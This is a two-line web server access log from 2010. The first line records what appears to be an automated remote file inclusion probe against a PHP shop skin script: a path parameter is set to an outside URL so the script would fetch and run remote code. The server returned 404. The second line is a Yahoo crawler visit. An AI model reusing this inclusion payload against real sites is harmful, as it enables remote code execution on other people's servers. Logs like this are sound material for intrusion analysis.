61.63.82.14 - - [12/Feb/2010:08:51:12 -0800] "GET /logs/access_100115.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:08:51:21 -0800] "GET /ideal/?S=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
